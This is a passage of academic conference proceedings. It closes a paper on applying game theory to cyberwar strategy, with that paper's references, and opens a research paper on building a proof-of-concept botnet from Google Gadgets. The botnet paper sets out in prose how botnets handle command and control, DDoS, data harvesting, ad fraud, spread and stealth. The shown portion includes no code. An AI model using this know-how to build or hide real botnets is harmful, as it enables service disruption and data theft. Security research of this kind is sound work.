Because of the private sector‟s lack of incentives to collaborate, coupled with private companies‟<br />

incentives not to divulge information about breaches (See, e.g., Gal-Or and Ghose 2004), there is an<br />

opaqueness about cybersecurity vulnerabilities which can produce misinformation. For instance, there<br />

has been a longstanding assumption that cyberattackers are exploiting unpatched computers after the<br />

patch has been released-- Internet security expert Eric Rescorla (2004) has even argued against<br />

disclosure and frequent patching for this reason. However, the latest Verizon data breach report does<br />

not support this: "In the past we have discussed a decreasing number of attacks that exploit software<br />

or system vulnerabilities versus those that exploit configuration weaknesses or functionality…[This<br />

year] there wasn‟t a single confirmed intrusion that exploited a patchable vulnerability” (2010: 29). In<br />

other words, as Verizon‟s 2009 Report stated, "vulnerabilities are certainly a problem contributing to<br />

data breaches but patching faster is not the solution” (2009:18).<br />

There is another concrete instance of misinformation in the “60 Minutes” video (2009) that claimed<br />

that the Brazilian powergrid was taken down by hackers. While the video met wide acceptance and<br />

generated apocalyptic fears, Bob Giesler, Vice President for Cyber Programs at SAIC, soon avowed<br />

the video to be “part of the dialogue that is absolutely wrong. The Brazilian powergrid dropped<br />

because of poor and faulty maintenance.” Giesler was corroborated when Wired Magazine (2009)<br />

reported that there was an investigation, and the blackout was “actually the result of a utility<br />

company‟s negligent maintenance of high voltage insulators on two transmission lines.”<br />

Misinformation about our cyber nemeses obscures analysis of policy needs and threat prioritization.<br />

Game theory cannot apply efficiently when we miscalculate or fail to identify those against whom we<br />

are playing.<br />

4. Moving from a linear to a biological model<br />

High reliance on private sector for cyber development means the DoD must use a customer-driven<br />

intelligence model, identifying needs and contracting for them. Yet competition for contracts does not<br />

occur in a perfectly competitive environment, and reliance upon it incorrectly presumes that the<br />

government has perfect information about their own needs and the risks of disclosing them. Umehara<br />

and Ohta (2009: 323) model transparency as a zero-sum game, and “assume that when a<br />

government agency makes a decision it knows the total amount of the potential damage." We may<br />

need to reevaluate the customer-driven intelligence model to find ways to harness more of the<br />

brainpower that exists not only in the private sector but also within the nonprofit, academic, and<br />

government domains—such as the working group that came together to face the Conficker virus<br />

challenge (See Moscaritolo 2009).<br />

Similarly, there are “weapons” confronting the DoD in the cyber arena that do not come from<br />

traditional or foreign enemies, such as the Wikileaks disclosures. As Giesler (2009) phrased it, “The<br />

challenge to the government is: how do you harness that decentralized, netcentric organism? How do<br />

you enable the ecosystem's antibodies to react to these things as opposed to regulating and breaking<br />

it down? How do you nurture that reaction?” This decentralized power emerged in the response to<br />

Pakistan blocking Youtube-- as Jonathan Zittrain (2009) reminds, this was a crisis to which NANOG,<br />

“an informal network of nerds, some of whom work for various ISPs,” promptly responded.<br />

Cyberwar strategy requires us to think outside of a linear security-investment frame of mind toward<br />

weapons development. The most accurate model of cyber threat appears to one that is biological—<br />

specifically, one that is epidemiological— in its response to invasion. In the case of the Estonian<br />

cyberattacks, Giesler (2009) offers as example, “it was the banking sector, it was the tellco sector that<br />

responded,” and “I started to think „Maybe that's the right model. This stuff is so decentralized, the<br />

problem is so pervasive and so fast…how you organize around a problem will dictate how you solve it<br />

and it requires a lot more dialogue.” The Department of Defense has recognized this interweaving of<br />

capabilities and data, and released the more oblique statement, “We are in the Age of<br />

Interdependence, out of the Information Age” (DoD 2009 Vision <strong>Conference</strong>).<br />

26


Merritt Baer<br />

Effective cyberintrusion defenses analog the epidemiological model for responding to an invader.<br />

Some have warned of a “cyber pearl harbor”; this seems too kinetic-world to form an accurate<br />

description of the threat. As Giesler asserts, we ought to be talking about cyber-destruction like a<br />

cancer—“you already have it, it‟s hard to detect, it may be fatal but it‟s also treatable.” It may be that<br />

the best responses to cyberwar are not found by studying war—at least not the ones in our history<br />

books involving cannons or tanks.<br />

Similarly, rather than a process of continual growth, cyber evolution, like biological evolution, seems<br />

more aptly characterized as punctuated equilibrium—fairly long periods of relative stasis followed by<br />

quick, drastic periods of breakthrough. (An example of a breakthrough in the cyber context could be<br />

the advent of cloud computing.) Correspondingly, one of the reasons why reaching Nash equilibrium<br />

is unlikely in the cyberwar context is that it under unstable conditions, evolutionarily stable strategies<br />

don‟t run a typical course. As evolutionary biologist Klaus Rohde (2005: Appendix 3) writes, “frequent<br />

and drastic abiotic and biotic changes in the environment which affect the fitness (reproductive<br />

success) of potential contestants in evolutionary „games,‟ will make it more difficult to establish<br />

evolutionary stable strategies, because the establishment of an ESS cannot keep up with the<br />

changes.” Because cyber evolution is not linear but organic, it forces us to treat it according to the<br />

economics of biology. The DNI‟s “Vision 2015” report addresses the deliverables aspect of this: “We<br />

cannot evolve into the next technology „S curve‟ incrementally; we need a revolutionary approach.<br />

Breakthrough innovation, disruptive technologies, and rapid transition to end-users will be required…”<br />

Applying game theory to cyberwarfare strategy allows us to make predictions that transcend lockstep<br />

models, that change based on resources, and that take into account other players‟ strategies and<br />

environmental conditions. Thus, while there is no solution nor even an accurate map of potential<br />

moves in game theory, it seems yet to be our best tool for transcending the perpetual reactiveness<br />

that has characterized cyber- information security efforts.<br />

5. Uses of game theory<br />

5.1 Layered defense<br />

While cyberwar strategy is a game of imperfect information, there are always choices available, and<br />

the vulnerabilities associated with each choice are not random but are often knowable or predictable,<br />

at least to some extent. We know that the risks of using open-source materials are in its lack of<br />

restriction; we know that the weakness that comes from use of highly classified, air-gapped (or in<br />

Zittrain-speak, “tethered”), networks come from a loss of functionality and “generativity.” Diversity and<br />

interoperability are tradeoffs, as are embrittlement and toughening. These are zero-sum games; but<br />

the overall strategy is not. While one can not create a network that is maximally resistant to random<br />

faults and maximally resistant to targeted faults, one can take into account the particular weaknesses<br />

and likelihoods of attack so that the weaknesses overlap in resistant ways-- ways that correspond to<br />

risk preferences and security priorities. As the banking and credit card systems have worked to create<br />

overall robustness through non-overlapping weaknesses, other providers (including infrastructural)<br />

should be able to create calculated layers of defense if there were coordination and appropriate<br />

budgeting.<br />

5.2 Identifying nodes robustly<br />

In game theory, the identification of possible choices is termed alpha-beta pruning—there is not an<br />

unlimited number of desirable outcomes therefore there is not an unlimited number of choices. One<br />

can prune down the number of nodes evaluated in the search tree. Alpha-beta pruning represents the<br />

fact that as soon as one move can be proven less desirable than another, it need not be further<br />

evaluated. One‟s search can then steer toward the more promising subtree(s), creating an optimal<br />

search path.<br />

To do this effectively first requires diversity and creativity—that is, the ability to identify many possible<br />

nodes. Defense Secretary Robert Gates stated that the Pentagon is “desperately short of people who<br />

have capabilities (defensive and offensive cybersecurity war skills) in all the services and we have to<br />

address it.” (Booz Allen 2009: 1). The key human-side aspect of cyberwar strategy is to effectively<br />

uncover all possible decision paths, which requires foundationally that the Department of Defense do<br />

a more effective job of recruiting and retaining diverse talent.<br />

27


Merritt Baer<br />

Identifying new nodes also requires a model that takes into account the creative possibilities that exist<br />

in the cyber world (which do not exist as concretely in, for example, the nuclear world) for moves that<br />

serve what biological models call “posturing”— flexing muscles to show capability rather than to enact<br />

any immediate goal. Species which posture rather than fight tend to compete via a “war of attrition.”<br />

Applying this to international security reveals that there are more available cyberwar decision paths<br />

than those which enact straightforward violence. As Rohde (2010) stated, taking into account<br />

posturing is useful because it accounts for different forms of power on the changing landscape in<br />

which the competition occurs. Rohde explains, “Climate change, for example, may have unforeseen<br />

consequences for how nations behave: a war of attrition may become more aggressive.” This game<br />

cannot be modeled linearly based on how many canons or bombs a country has stockpiled; actual<br />

capabilities may be less or more than those the country chooses to posture. (See, e.g., Woodward<br />

2010 on the “speculative” possibility that Stuxnet was an Israeli attack on an Iranian target.) Cyberwar<br />

posturing requires a model more nuanced than M.A.D. To fully exploit the potential for modeling game<br />

theoretical strategies, we must recruit diverse minds to think up new possible nodes, and validate<br />

different forms of power to determine what strategies serve the end goal.<br />

5.3 Weighting nodes intelligently<br />

Once one isolates the problem and defines the corresponding set of goals in a given situation, one<br />

must evaluate the other players‟ likely moves. Game theory can play an important role at this stage<br />

because it is well-established that human cognition tends not to react to threats in a fully rational way,<br />

or as economics would dictate. Jonathan Renshon and Nobel Prize winner Daniel Kahneman have<br />

written on these human cognitive obstacles to economically-optimal decisions. According to<br />

Kahneman and Renshon (2006), “humans cannot make the rational calculations required by<br />

conventional economics. They rather tend to take mental shortcuts that may lead to erroneous<br />

predictions, i.e., they are biased.” Using game theory to make a security strategy that is a calculated<br />

derivative of mapped potential outcomes allows decisionmakers to lessen those biases and respond<br />

to threats proportionately/economically.<br />

The fact that there are limited existing examples of cyberwarfare interactions complicates this stage of<br />

analysis—successful programming in games like chess and Othello have relied upon finite patterns of<br />

previous actions: “A hill climbing algorithm can… be used based on a function of the number of<br />

correct opponent move predictions taken from a list of previous opponent moves or games.” (Hamilton<br />

et al., 2002: 4). Lack of behavioral precedent models will increase the margin of error—if one could<br />

use a killer heuristic (prioritizing moves that have been shown to produce cutoff in other situations),<br />

the pruning would be more successful. (Winands 2004). It is possible that red-teaming could provide<br />

some approximations of history—indeed, one of the recommendations in the Report of the Defense<br />

Science Board (2010: viii) is to “establish red teaming as the norm instead of the exception.” And all<br />

players must play on the board of limited empirical history.<br />

In an intersecting sense, the uses of game theory in assigning weight neutrally to nodes of a decision<br />

tree may be especially useful in the cyber context because our reactions seem to derive from<br />

evolutionary strategies, and cyber may activate those uniquely. Having a "face" to the threat is crucial<br />

to our reaction, according to psychologist Daniel Gilbert (2007) who offers as example that global<br />

warming does not push our buttons like terrorism and other threats "with a mustache" do (think of the<br />

resources we devote to deaths by terrorism, compared to deaths by cancer or hunger). Cyberwar has<br />

a degree of sanitation to it—unlike bombs and tanks, it does not necessitate face-to-face<br />

confrontation with the effects of one‟s decisions. (See Baer 2010b).<br />

6. Avoiding cyberwar: Could we have cyber disarmarment?<br />

The economic inefficiencies of an offensive cyber arms race (not to mention the danger of allowing<br />

the US and others to stockpile a cyber arsenal) have led some to propose solutions to avoid this<br />

altogether. Harvard Professor Jack Goldsmith (2010) has proposed something akin to an international<br />

negotiating architecture to preempt cyberwar and the costs of cyberdefense. Certainly, the U.S. would<br />

benefit from having red lines drawn. But even if we could have the prescience to create a sense of<br />

rules that would anticipate the new ways in which the Internet will be useful for attack (which is<br />

unlikely given the range of possibilities, many of which might not be directly violent— “the range of<br />

possible options is very large, so that cyberattack-based operations might be set in motion to<br />

influence an election, instigate conflict between political factions, harass disfavored leaders or entities,<br />

or divert money.”-- National Research Council Committee on Offensive Information Warfare Section<br />

28


Merritt Baer<br />

1.5), there seems to be no way to guarantee China‟s (or North Korea‟s or Russia‟s) compliance<br />

unless there are some enforcement machineries, and some remedies in instances of transgression.<br />

Cheating seems almost assured considering that, for instance, North Korea continually reneges on its<br />

nuclear negotiations, and cyber disarmament would be pragmatically much easier to cheat.<br />

Even if we could get a global cyber-enforcement organization in place, cyber attribution problems<br />

would allow for rogue states (let alone non-nation-state actors which have no real duty to comply and<br />

are harder to retaliate against) to act outside of the red tape. Defectors could get a comparative<br />

advantage by cheating (think to the classic prisoners‟ dilemma, in which defecting is always the<br />

optimal strategy even though it doesn‟t produce optimal outcome overall), and could do it remotely<br />

through US computers, as in the Estonia attack. For a disarmament agreement to be enforceable<br />

would require a change in the Internet architecture in the sense of decreasing anonymity or some<br />

other sea change to incentivize compliance. One could impose sanctions on nations that allow attacks<br />

to happen-- but this strict liability regime would confront practical problems: finding accurate attribution<br />

is difficult and in fact, the latest numbers reflect more botnet-appropriated computers in the U.S. than<br />

anywhere else (Prince 2010). Establishing cyber rules and then not being able to enforce them<br />

because of attribution problems could be embarrassing.<br />

Moreover, like nuclear war game theory, cyberwar game theory decision paths are complicated by the<br />

fact that there are differences in risk tolerance among players. Thus, while “the usual assumption is<br />

that an opponent evaluation function uses a subset of the heuristics in our own evaluation function,<br />

with different weights” (Hamilton et al. 2002: 4), the heuristics of cyber players may vary dramatically,<br />

especially in interactions between countries with generally greater risk tolerance regimes in<br />

government. Since “players' decisions are optimally based not only on their own cost functions (which<br />

each knows) but also on their opponent's cost structure (which is known only in probability)”<br />

(McCormick and Owen 2006), we cannot assume that our incentives for desiring disarmament match<br />

other players‟.<br />

Larger values-based issues require us to evaluate what kind of behavior we find acceptable online<br />

and what is a violation of international ethics or human rights. This is part of a dialogue that needs to<br />

occur before a legal framework can enforce it. As I have written, we all have a stake in this<br />

determination (Baer 2010a). The purpose of this paper, however, was the strategic possibilities and<br />

not the broader development of a code of human rights online.<br />

7. Conclusions<br />

Game theory is not a panacea. As I have described, cyberwarfare defies a number of common game<br />

theoretic assumptions. However, it is worth exploring game theory‟s applications to cyberwarfare<br />

strategy because game theory lends itself to viewing larger patterns, and approaching problems<br />

holistically. In cyber, the lines between fighting and research melt away, and the computer scientists<br />

mobilizing the tools to wage cyberwar look more like Mozart or Einstein than Napoleon. Following the<br />

symmetries that occur in the natural world, the responses of epidemiology and the growth patterns of<br />

evolutionary biology, game theory allows us to gauge efficacy in a non-linear dimension. Many<br />

experts have compared cyberwar strategy to kinetic-world models, from nuclear strategy (Chertoff, in<br />

Espiner 2010) to air warfare strategy (Baker 2010). I find that kinetic-world models of warfare fall short<br />

of describing the problem of cyberwarfare or its possible treatments. There is no real winning in<br />

cyberwar; there is continual reorientation.<br />

Game theory, worked upon a biological model, holds promise for cyberwar strategy because it<br />

transcends linear models that assume aspects of the landscape to be fixed. Cyberwarfare is delicate<br />

but not haphazard, and game theory can lead decisions that address true threats by avoiding human<br />

bias. If we maintain a robust workforce, game theory can also allow decisionmakers to identify<br />

emerging nodes on the decision tree. In an occam‟s razor sense, it may be that to anticipate the curve<br />

in the cyberwarfare game, we ought to return to the simple beauty of early programming, when the<br />

Internet was unmolded, an organic cell of potential energy. Cyber development eludes kinetic-world<br />

models because it is not just about harnessing power, it is about creating new pockets of utility and<br />

exploiting them in creative ways.<br />

Acknowledgements<br />

Thanks to Professor Jack Goldsmith for the opportunity to write a first version of this research in<br />

seminar and for the exposure to many of cyberwarfare‟s leading minds.<br />

29


References<br />

Merritt Baer<br />

Anderson, R. and Moore, T. (2006) “The Economics of Information Security,” Science Vol. 314 No. 5799, pp.<br />

610-613.<br />

Arnold, S. A., et al. (2009) "Can Profit Policy and Contract Incentives Improve Defense Contract Outcomes?"<br />

Institute for Defense Analyses, Washington, DC.<br />

Baer, M. (2010a) “Cyberstalking, and the Internet Landscape We Have Constructed.” Virginia Journal of Law and<br />

Technology 154 Vol. 15, No. 2.<br />

-- (2010b) “Cyber Attacks & the Ethical Dimension of the Google China Episode,” [online], Global Comment,<br />

http://globalcomment.com/2010/cyber-attacks-the-ethical-dimension-of-the-google-china-episode/<br />

Baker, S. (2010) “Cyberwar: What is it Good For?” ABA 20 th Annual Review of the Field of National Security Law,<br />

Washington, DC.<br />

Baram, M. (2009) “Wasteful Spending by Private Contractors in Afghanistan Climbs to $1 Billion, as their<br />

Numbers Multiply,” Huffington Post.<br />

Booz Allen Hamilton (2009) “Cyber In-Security: Strengthening the Federal Cybersecurity Workforce,” [online],<br />

http://www.ourpublicservice.org/OPS/publications/viewcontentdetails.php?id=135<br />

Calbreath, D. (2005) "MZM Scandal Illuminates Defense Contract Tactics," [online], Sign on San Diego,<br />

http://archives.signonsandiego.com/news/politics/cunningham/20050821-87-mzmscand.html<br />

Carney, J. (2010) “The War Against Wikileaks is Worse than Wikileaks,” [online], CNBC,<br />

http://www.cnbc.com/id/40551046/<br />

CBS News (2009) “Cyber War: Sabotaging the System” 60 Minutes,<br />

http://www.cbsnews.com/stories/2009/11/06/60minutes/main5555565_page1.shtml?tag=contentMain;conte<br />

ntBody<br />

Charney, S. (2009) “Reviewing the Federal Cybersecurity Mission,” Testimony Before the U.S. House Committee<br />

on Homeland Security Subcommittee on Emerging Threats, Cybersecurity, and Science and Technology,<br />

Washington, DC.<br />

Clockbackward (2009) “Does Beauty Equal Truth in Physics and Math?” [online], Clockbackward Essays,<br />

http://www.clockbackward.com/2009/03/11/does-beauty-equal-truth-in-physics-and-math/<br />

DoD 45 th Annual Federal Forecast (2009) Department of Defense Special Topic Cyber Security: TechAmerica<br />

2009 Vision <strong>Conference</strong>, Washington, DC.<br />

Director of National Intelligence, “Vision 2015: A Globally Networked and Integrated Intelligence Enterprise,”<br />

[online], HYPERLINKhttp://www.dni.gov/Vision_2015.pdf<br />

Espiner, T. (2010) “Chertoff Advances Cyber Cold War,” [online], ZDNet UK<br />

http://www.zdnet.co.uk/news/security-threats/2010/10/14/chertoff-advocates-cyber-cold-war-40090538/<br />

Gal-Or, E. and Ghose, A. (2004), “The Economic Consequences of Sharing Security Information,” Economics of<br />

Information Security, Vol. 12, pp. 95-104.<br />

GAO Report to Congressional Committees (2009) "Defense Acquisitions: Assessments of Selected Weapons<br />

Plans," [online], http://www.gao.gov/new.items/d09326sp.pdf<br />

Geer, D., Jr., Sc.D. (2010) “Cybersecurity and National Policy,” Harvard National Security Journal, Vol. 1.<br />

Giesler, R. (2009) personal conversation with the author.<br />

Gilbert, D. (2007) “If Only Gay Sex Caused Global Warming,” Huffington Post.<br />

Goldsmith, J. (2010) “Can We Stop the Global Cyber Arms Race?” Washington Post.<br />

Hathaway, M. (2009) “Strategic Advantage: Why America Should Care About Cybersecurity,” Harvard Kennedy<br />

School, Cambridge, MA.<br />

Hamilton, S.N., Miller, W.L., Ott, A., and Saydjari, O.S. (2002) The Role of Game Theory in Information Warfare,<br />

and Challenges in Applying Game Theory to the Domain of Information Warfare, Fourth Information<br />

Survivability Workshop ISW-2001/2002, Vancouver, BC Canada<br />

Winands, M.H.M. (2004) “Informed Search in Complex Games,” Datawyse b.v., Maastricht, The Netherlands.<br />

Jamakka, J. and Mölsä, J.V.E. (2005) “Modeling Information Warfare as a Game,” Journal of Information Warfare<br />

Vol. 4, No. 2, pp. 12-25.<br />

Kahneman, D. and Renshon, J. (2006) “Why Hawks Win.” Foreign Policy.<br />

http://www.foreignpolicy.com/articles/2006/12/27/why_hawks_win<br />

Libicki, M. (1995) What is Information Warfare? National Defense University, Washington, DC.<br />

McCormick, G. H. and Owen, G. (2006) "A Game Model of Counterproliferation, with Multiple Entrants,"<br />

International Game Theory Review, Vol. 8, No. 3, pp. 339-353.<br />

Moscaritolo, A. (2009) “Industry Collaboration: Drumming Up Defenses,” SC Magazine.<br />

MSNBC (2007) “Defense Dept. warns about Canadian spy coins,” [online],<br />

http://www.msnbc.msn.com/id/16572783/<br />

National Research Council Committee on Offensive Information Warfare (2009) “Technology, Policy, Law and<br />

Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities,” The National Academies Press,<br />

Washington, DC.<br />

http://www.abanet.org/natsecurity/cybersecurity_readings/1final_report_cyberattack_nasnae.pdf<br />

Prince, B. (2010) “Microsoft: U.S. Home to Most Botnet PCs,” eWeek [online]<br />

http://www.eweek.com/c/a/Security/Microsoft-US-Home-to-Most-Botnet-PCs-216614/<br />

Project Honey Pot, (2009) “Our 1 Billionth Spam Message” [online]<br />

http://www.projecthoneypot.org/1_billionth_spam_message_stats.php<br />

30


Merritt Baer<br />

Report of the Defense Science Board (2010), “Capability Surprise,” [online],<br />

http://www.acq.osd.mil/dsb/reports/ADA506396.pdf<br />

Rescorla, E. (2004) “Is Finding Security Holes a Good Idea?” Third Workshop on the Economics of Information<br />

Security, Minneapolis, MN.<br />

Reuters (2010) “Wikileaks Battle: A New Amateur Face of Cyber War?” CNBC<br />

Rhode, Klaus (2005) Nonequilibrium Ecology. Cambridge University Press, Cambridge, MA.<br />

-- [online] “Games Theory (Nash Equilibria) in International Conflicts,” http://knol.google.com/k/games-theorynash-equilibria-in-international-conflicts#<br />

Saydjari, O.S. (2004) “Cyber Defense: Art to Science,” Communications of the ACM Vol. 47, No. 3 pp. 52-57.<br />

Schavland, J., Chan, Y., and Raines, R.A. (2009), “Information Security: Designing a Stochastic-Network for<br />

Throughput and Reliability.” Naval Research Logistics Vol. 56, No. 7, pp. 625-641.<br />

Shapcott, Brad “Economics Proverbs,” [online], CEO Magazine<br />

http://ceomagazine.biz/hrmproverbs/economicsproverbs.htm<br />

Shen, D., Chen, G., Haynes, L.S., Cruz, J.B., Kruger, M. and Blasch, E. (2007) “A Markov Game Approach to<br />

Cyber Security,” [online], SPIE Newsroom, "https://spie.org/x15400.xml?ArticleID=x15400"<br />

https://spie.org/x15400.xml?ArticleID=x15400<br />

Shofield, J. (2008) “It‟s Every Man for Himself,” The Guardian.<br />

Sills, M. (2009) “ULL gets Air Force contract: Researchers to develop preemptive cyber security strategies,” The<br />

Advocate [online] http://www.2theadvocate.com/news/79589152.html?c=1287843989513<br />

Soares, M. (2009) “Brazilian Blackout Traced to Sooty Insulators, Not Hackers,” Wired Magazine.<br />

Spring, B. “Nuclear Games: A Tool for Examining Nuclear Stability in a Proliferated Setting,” [online],<br />

http://www.heritage.org/Research/nationalSecurity/upload/hl_1066.pdf<br />

Umehara, E. and Ohta, T. (2009) “Using Game Theory to Investigate Risk Information Disclosure by Government<br />

Agencies and Satisfying the Public—the Role of the Guardian Agent," Systems, Man and Cybernetics, Part<br />

A: IEEE Transactions on Systems and Humans Vol. 39, No. 2, pp. 321-330.<br />

Verizon 2009 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />

http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/<br />

Verizon 2010 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />

http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf<br />

Wilson, C. (2008) “Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress”<br />

Congressional Research Service Order Code RL32114, Washington, DC.<br />

Woodward, P. (2010) “Stuxnet: the Trinity Test of Cyberwarfare,” War in Context [online]<br />

http://warincontext.org/2010/09/23/stuxnet-the-trinity-test-of-cyberwarfare/<br />

Zittrain, J., Lord, Lt. Gen. W., Geer, D., (2010) Cybercrime and Cyberwarfare class, Harvard Law School.<br />

Zittrain, J. (2008) The Future of the Internet—and How to Stop It. Yale University Press, New Haven, CT.<br />

-- (2009) “The Web as Random Acts of Kindness” [online video]<br />

http://www.ted.com/talks/jonathan_zittrain_the_web_is_a_random_act_of_kindness.html<br />

31


Who Needs a Botnet if you Have Google?<br />

Ivan Burke and Renier van Heerden<br />

Council for Scientific and Industrial Research, Pretoria South Africa<br />

IBurke@csir.co.za<br />

RvHeerden@csir.co.za<br />

Abstract: Botnets have become a growing threat to networked operations in recent years. They disrupt services<br />

and communications of vital systems. This paper, gives an overview of the basic anatomy of a Botnet and its<br />

modus operandi. In this paper, we present a Proof of Concept of how Google gadgets may be exploited to<br />

achieve these basic components of a Botnet. We do not provide a full fledged Botnet implementation but merely<br />

to mimic its functionality through Google Gadget API. Our goal was to have Google act as proxy agent to mask<br />

our attack sources, establish Command and Control structure between Bots and Botherders, launch attacks and<br />

gather info while at the same time maintaining some degree of stealth as to not be detected by users.<br />

Keywords: Botnet; Google Gadget; Command and Control; DDoS<br />

1. Introduction<br />

A Botnet is a collection of compromised computers or agents that are infected by malware. These<br />

agents use sophisticated command and control techniques to execute complex and distributed<br />

network attacks. Agents are usually unaware that they have been compromised and are partaking in<br />

these attacks. They are often controlled by an external agent known as Botherders or master agents<br />

(Banks 2007, Vamosi 2008).<br />

According to Steward (in Vamosi, 2008), the techniques used by large Botnets such as Storm are<br />

available online, but a Botnet is more than the sum of its parts. What makes a Botnet successful is<br />

combining all these components into a coherent structure.<br />

Stracener states in (Stracener, 2008), that future malware will run on the internet instead of<br />

standalone computers. His premise is that, as the modern computer infrastructure moves closer to a<br />

networked cluster or cloud so too will the threats to these infrastructures. He warns of his concerns<br />

about malicious gadget and key vulnerabilities related to gadgets. A study conducted by WorkLight<br />

Inc. (in MacManus, 2008), found that 48% of internet bank users, ages 18-34, would use secure thirdparty<br />

Web 2.0 gadgets for their personal banking, if their banks did not provide them with such<br />

functionality. This would imply the users would be able to make a informed decision about what it<br />

means to identify a Web 2.0 gadget as being secure.<br />

Stracener's concerns are mimicked by The Cloud Security Alliance in their paper (Hubbard et al.,<br />

2010). They identify seven key threats to Cloud computing security:<br />

Abuse and nefarious use of cloud computing<br />

Insecure interfaces and APIs<br />

Malicious insiders<br />

Shared technology issues<br />

Data loss or leakage<br />

Count or service hijacking<br />

Unknown risk profile<br />

In this paper we demonstrate a rudimentary Botnet construct by exploiting Google services to host our<br />

Botnet. We investigate the core components of a Botnet and then attempt to mimic the components<br />

using Google Gadget API. It is not the goal of this paper to illustrate the weaknesses in a specific API<br />

but rather to illustrate the danger of user generated content on the World Wide Web. Our aim is to<br />

proof that online services can be organized into a botnet like structure.<br />

Google Gadgets API is design for rapid development of small web based utility applications such as:<br />

calendars, currency converters and news feed readers (Peterson, 2009). By including Open Social<br />

API to a Google gadget, one can enhance shared gadget interaction and extend one’s gadget to the<br />

Social Media domain.<br />

32


Ivan Burke and Renier van Heerden<br />

Flaws in Google Gadgets have been demonstrated by Barth et al. (2009). They noted that JavaScript<br />

can lead to exploitation. These vulnerabilities include session sharing vulnerabilities which enable<br />

Cross-Site Scripting (XSS) and malicious redirects to Man-in-the-middle attacks. Google has been<br />

reluctant to fix some of these vulnerabilities since 2004. (Robert 2008)<br />

In Section 2, we investigate the composition of a basic Botnet. In Section 3, we describe our attempt<br />

at mimicking these components. In Section 4, we discuss our Botnet model. In Section 5, we propose<br />

possible future application of this work. In Section 6, we discuss our conclusion and possible means<br />

of stopping these types of Botnets.<br />

2. Anatomy of a botnet<br />

Botnets tend to share communalities in their structure and design. In this Section, we describe the<br />

common components of a Botnet as well as their role within the Botnet.<br />

Figure 1: Anatomy of a Botnet<br />

2.1 Command and control component<br />

A large part of a Botnet’s success can be attributed to its ability to execute large, synchronized,<br />

distributed attacks. This would require sophisticated command and control (C2) structures to coordinate<br />

these attacks (Banks 2007, Ollmann, 2009).<br />

Communication channels usually relay herder instructions, such as commands to execute on remote<br />

PC. Bots use channels to send back retrieved data such as key logger information or command<br />

response information. These communications need to be covert in order to hide the Botnet activities.<br />

Over the years several covert channels have been used to communicate commands between Bot and<br />

Botherder such as Twitter, Internet Relay Chat (IRC) and Instant Messages. Several advance C2<br />

techniques such as steganography or social media sites to hide Botnet communication in plain sight.<br />

Next we look at the types of attacks that could be executed by Botnots (Ollmann, 2009)<br />

33


2.2 Attack vector<br />

Ivan Burke and Renier van Heerden<br />

Botnets are usually goal orientated. For the most part their goal is either profit or service disruption.<br />

There are several means of achieving these goals using botnets. In this Section, we discuss some<br />

attacks commonly used by Botnets.<br />

2.2.1 Distributed denial of service attack<br />

Due to Botnet size and the distributed nature of Botnets, Distributed Denial of Service attacks (DDoS)<br />

are a popular form of attack (Felix et al., 2005). In this attack the Botherders issue a command to all<br />

its subordinate Bots to connect to a targeted system at the same time. The targeted system can<br />

usually not handle the sudden influx of requests and which cause system services to be temporarily<br />

disrupted. Botherder rent out these services to competitors to disrupt competitor services (Kiefer,<br />

2004).<br />

2.2.2 Spam relay<br />

The first generation of Botnets where reliant on email to spread and infect various hosts. Botnets<br />

would open a SOCKS v4/v5 proxy on compromised machines, allowing it to send spam at the request<br />

of the Botherder. Botnets also harvested email addresses from infected hosts to add to its spam lists.<br />

(Engate, 2009)<br />

2.2.3 Data harvesting<br />

Botnets report back valuable system information to Botherders. This information can include key<br />

stroke logs, system vulnerabilities, service availability on host machine, open port data and network<br />

traffic. Botherders collect and collate this data to retrieve data such as user names and passwords<br />

which could be used for mass identity theft. Botnets scan for system weakness that could possibly be<br />

exploited at a later stage if Botnet functionality is compromised in future. By sniffing network traffic<br />

Botnets could become aware of rival Botnets infecting host PCs and disrupt these rival Botnet<br />

functionality.<br />

2.2.4 Ad serve abuse<br />

Botnets can be utilized for monetary gain. Botnets can be used to exploit the Pay Per Click or<br />

Impression Based internet advertising models. By forcing infected machines onto ad serve sites or<br />

using iFrames to fool users into clicking on advertisements, Botherdes can generate revenue from<br />

marketing companies.<br />

Botherders infect host PC with browser add-ons, Browser Helper Objects (BHO), or browser<br />

extensions which changes user browser interaction to relay them to ad serve sites or simply generate<br />

brows requests to ad serve sites automatically. These Add-ons can serve a dual purpose, as it can<br />

collect user data from browser and relay it to Botherder.<br />

2.3 Viral capability<br />

One of the great strengths of a Botnet is its sheer size. This also makes Botnets so tough to take<br />

down. Hence it is essential for a Botnet to spread fast and to vastly distributed systems.<br />

The first generation of Botnets where primarily reliant on email and malicious page redirects to<br />

spread. Modern Botnets such as Asprox, Koobface, Zhelatin and Kreios C2 spread via social media<br />

(Denis, 2008) (Eston, 2010). The Botnet posts users content on social networks sites which infect any<br />

user that follows the malicious links. Some Botnets have been known to hide within popular trusted<br />

applications. Trojans drop malicious code in trusted address spaces and exploits weaknesses in<br />

hosts PC to compromise it and make it part of Botnet network.<br />

2.4 Stealth component<br />

Botnets are only useful as long as they are not detected. Hence stealth is a fundamental requirement<br />

for all Botnets.<br />

It is the opinion of the researchers that stealth is required in each of the components previously<br />

identified in this section. If communications are noisy, infected host might become aware of malicious<br />

34


Ivan Burke and Renier van Heerden<br />

activity and firewalls or intrusion detection systems might block communications. If attack is disruptive,<br />

anti-virus companies will detect and block the attack. Mechanisms used to spread Botnets must seem<br />

organic and natural for it to be affective. It is the combination of these requirements that make Botnets<br />

so difficult to construct and maintain.<br />

In the next section we our attempt at constructing these components using Google Gadgets API.<br />

3. Attempt at constricting a botnet<br />

In this Section, we will discuss our attempt to create a proof of concept Botnet; At first we look at<br />

cloud computing as a whole and then more specifically using Google Gadgets API we investigate the<br />

possibility of using Cloud computing to mimic the attack components of a Botnet, as presented in<br />

Section 2. It is important to note that, this paper is not just specifically targeted towards exposing<br />

Google API weaknesses but to illustrate the dangers of user generated content and cloud computing<br />

on the World Wide Web.<br />

According to Garner (Garner, 2008), cloud computing can be defined as style of computing whereby<br />

IT-related capabilities are provided as a service using Internet technologies to connect to multiple<br />

customers. Botnets have already been found using popular cloud such as Amazon's EC2 as a<br />

Command and Control unit (Goodin, 2009). In a report compiled by The Cloud Security Alliance,<br />

